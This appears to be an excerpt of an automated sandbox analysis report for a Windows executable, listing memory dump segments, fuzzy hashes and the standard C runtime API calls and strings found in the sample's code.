                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 397187078afbc73a77af68bd91820e66db5ac4c2a21b4e6c1584caad7e47903e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB1F4359007419BDB389B25CC92BF7B3AAEF44308F54452EEA8386784EE75ED85CB44
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 871e5e318aa003df20044793efda66ac3184649c55973e2f25afc2ba23d78642
                                                                                                                                                                                                                                                                  • Instruction ID: ace8906d21182bb1ae624ff458229cf6bc625ef28534c041d6340f23763bcae6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 871e5e318aa003df20044793efda66ac3184649c55973e2f25afc2ba23d78642
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C122E71A002259FDF25CF58C880BAAB7FEBB46704F4441EAD949EB645DB709E42CF81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: afc2b821aa198aa524a1ff759968927ee86305dc12ef67fe0f7c47614dbe355b
                                                                                                                                                                                                                                                                  • Instruction ID: ce7534d6d3f1ec1e610e20a8251d5e791ac0c43fb60edbc3a60d09ccb91aea7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afc2b821aa198aa524a1ff759968927ee86305dc12ef67fe0f7c47614dbe355b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F14F71E142199FDF14CF68D880AEDB7B6FF88314F158269E819AB784D730AE41CB94
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
• Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ea7131a454b09939ba4f5b4ec26593bcd2b4292e7448b858b17d3e2100c931d0
                                                                                                                                                                                                                                                                  • Instruction ID: 1d9b420e9d8a5c8f08a50573092b7a3777409910673fc7acc372380333a2cdfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea7131a454b09939ba4f5b4ec26593bcd2b4292e7448b858b17d3e2100c931d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE15F71A002289FDF65DF54C890BEAB7BEEF46304F1440EAD949AB745DB309E418F81
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 26037e08150b049d539549e03706b158b61703474c7f3de4826ac7da6a377219
                                                                                                                                                                                                                                                                  • Instruction ID: 9023b3128d9cc9843cbc7c679e65fdaffaac2d4edcd54726a74e97abdf299d34
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26037e08150b049d539549e03706b158b61703474c7f3de4826ac7da6a377219
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CB106729042559FDB158F68C891FFEBBE6EF59320F15816EE409EB341D235AD02C7A0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9ff0a415577c8fbee0802c1f89845ac2a2450d0ccadb9b26d2d9d7c32b155c6d
                                                                                                                                                                                                                                                                  • Instruction ID: ef10fc0b56e1965e55bba62e6f110d5fb442f102558aa12bd3790144060c8050
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ff0a415577c8fbee0802c1f89845ac2a2450d0ccadb9b26d2d9d7c32b155c6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7A12375A001298FCF24DF18C8917EDB7BAFB89304F1541EAD809A7741DB719E868F80
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ddb4ed16fa27ec0560be4d488ab72f8330fd0b800a7517f9d820764fe33525ff
                                                                                                                                                                                                                                                                  • Instruction ID: 4b388de0b8f238578912308c40dbf3b5082f20da68c61238bebff930a5a7e0a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddb4ed16fa27ec0560be4d488ab72f8330fd0b800a7517f9d820764fe33525ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40516171E00219AFDF15CF99C981AEEBBB6EF88300F19805DE515AB341D734AE51CB94
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1b9b0b4fa2faa95f0fefef11c3fe2977cee0889fa130319d2b42e11fb4690532
                                                                                                                                                                                                                                                                  • Instruction ID: c82fb5c71c826e6f8b56eeeaba45e77bef0085dd33100e5a67d532a56d5de66b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b9b0b4fa2faa95f0fefef11c3fe2977cee0889fa130319d2b42e11fb4690532
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE08C7291127CEBCB14DB98C90498AF3FDEB88B00B21009AF501D3200C2B0DE40C7E4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: aa779bde36d9e061813558042c8556282970ac181f840f9594f4ad85a9a1b274
                                                                                                                                                                                                                                                                  • Instruction ID: 086724d0c78a6036feea91a634f70465ec0724e28c240b76aa7ea1aaa16315db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa779bde36d9e061813558042c8556282970ac181f840f9594f4ad85a9a1b274
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39E08232900248EFCB40DBA8C049F4AB3F9EB08348F1048A8E804C3200C234EE80CA00
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fb8588dfe5004e7bd77bbba25fc7cbf581f86a86f676ca6ce434718d11d9ad95
                                                                                                                                                                                                                                                                  • Instruction ID: 97f575ef58cfbe95cb8f9320c599046d0709180d930c81f17680c93a20dcab05
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb8588dfe5004e7bd77bbba25fc7cbf581f86a86f676ca6ce434718d11d9ad95
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35C08C7400090047CE39D910C3713E43366AB92B82FC0088CC4120BB42D55F9CC3DB20
APIs
  • Part of subcall function 006D90CB: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 006D90E8
• GetLastError.KERNEL32 ref: 006D97F0
• GetFileType.KERNEL32(00000000), ref: 006D9803
• GetLastError.KERNEL32 ref: 006D980D
• CloseHandle.KERNEL32(00000000), ref: 006D9836
• CloseHandle.KERNEL32(?), ref: 006D9983
• GetLastError.KERNEL32 ref: 006D99B5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                                  • API String ID: 3086256261-2852464175
                                                                                                                                                                                                                                                                  • Opcode ID: ffa18d318651510c61b0d175406ee2ed1c2d3e2dddb30ab266b284106581b1ed
                                                                                                                                                                                                                                                                  • Instruction ID: f2acee0fcfa0d3471c4c71a9f33e1cf1c2a607d51a14d9b59c20097a378d54b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffa18d318651510c61b0d175406ee2ed1c2d3e2dddb30ab266b284106581b1ed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EA12632E141549FCF19DF68DC91BAD7BA2AB07320F18415EF802AF391DB358912CBA5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00745E52,00000104), ref: 006BD27D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                                                  • String ID: ^t$...$<program name unknown>$Microsoft Visual C++ Runtime Library$R^t$Runtime Error!Program:
                                                                                                                                                                                                                                                                  • API String ID: 514040917-4157939772
                                                                                                                                                                                                                                                                  • Opcode ID: 05c382c35a255fd08436617686aedee327ac4c73f6d722affbf04008c4b85502
                                                                                                                                                                                                                                                                  • Instruction ID: 0a5950e9f4970acf69da86dc9d05d709d2eff906dda607d5dacdb46371ace9c2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05c382c35a255fd08436617686aedee327ac4c73f6d722affbf04008c4b85502
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A2149B2E4061537D63162219C0AEEB369F9F92708F400439FD089A347F765CB41C3D9
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 006C3D6C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                  • Opcode ID: 2cb4912e5a6336a28fa97d4cc8eeb89f15c1c3e654dc72afe908ce39648b3195
                                                                                                                                                                                                                                                                  • Instruction ID: 33462ae304ac4b14fa91cbebcf0b737e443ecb5aebb43a1daaf3146ef6f559d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb4912e5a6336a28fa97d4cc8eeb89f15c1c3e654dc72afe908ce39648b3195
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2721F335A01221ABCB219B25DC40FBA376ADF43760F158119F953A7390E770FE00C6D1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00676DB5
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00676E41
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00676EAC
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00676EC8
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00676F2B
                                                                                                                                                                                                                                                                  • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00676F48
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2984826149-0
                                                                                                                                                                                                                                                                  • Opcode ID: 088af79065226a94862348b33447982bcfdf61864175bd613b4288e3d1bffd20
                                                                                                                                                                                                                                                                  • Instruction ID: 4c469a5daaacbeacd613c5b889e881008db50b7475fce6fcda8d3c5e7ea71493
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088af79065226a94862348b33447982bcfdf61864175bd613b4288e3d1bffd20
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC71E272E14A15ABDF309FA4DC41BEEBBB7AF05314F158069F818A7290D7389C04CBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00654433
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 0065449E
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006544BB
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006544FA
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00654559
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0065457C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                                                                                                                  • Opcode ID: c71de3ae87eecb367abf4aa57e83f839d3698c50c72966ec013c75d439a66e94
                                                                                                                                                                                                                                                                  • Instruction ID: 8ba3b2b37ccbc12017169bdb0f9ddd865c0bb04e5c81db8b0d4bbaa631f3a7b2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c71de3ae87eecb367abf4aa57e83f839d3698c50c72966ec013c75d439a66e94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD51E272900216ABDB208F60CC41FEF7BAAEF4574AF114169FD04E6250EB35CD99CBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,763EDE73,?,?,00000000,006EAF32,000000FF,?,006BECA4,?,?,006BEC53,?), ref: 006BED76
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006BED88
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,006EAF32,000000FF,?,006BECA4,?,?,006BEC53,?), ref: 006BEDAA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 5fd335bd897b35549b78ef74fd599e828d64d3e5dfb529cf7799eca4c012dcb7
                                                                                                                                                                                                                                                                  • Instruction ID: eb32f535509d900754bdcbb3aa9aeba7da669c73e298c9ad01217bf1fa6a4f6a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fd335bd897b35549b78ef74fd599e828d64d3e5dfb529cf7799eca4c012dcb7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DB75954619EFCB118F94DC05BFEBBB9FF05714F004526F811A22E0DBB99900CB54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,006C3E7A), ref: 006C3EED
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,006C3E7A), ref: 006C3EF7
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 006C3F35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-537541572
                                                                                                                                                                                                                                                                  • Opcode ID: 2d1dd36f97e1816b1af0189e2566ce1af40df017865dcc8dc3d9d5cbae8af797
                                                                                                                                                                                                                                                                  • Instruction ID: 0899ef2b23c044e2d5487c887498262884e874d38199fe37861d0c718a2f9864
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d1dd36f97e1816b1af0189e2566ce1af40df017865dcc8dc3d9d5cbae8af797
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0A734B88358BBEB501B10DC06FA93E27EB51B40F148428F91CA62E1EB71DA10D595
                                                                                                                                                                                                                                                                  Memory Dump Source
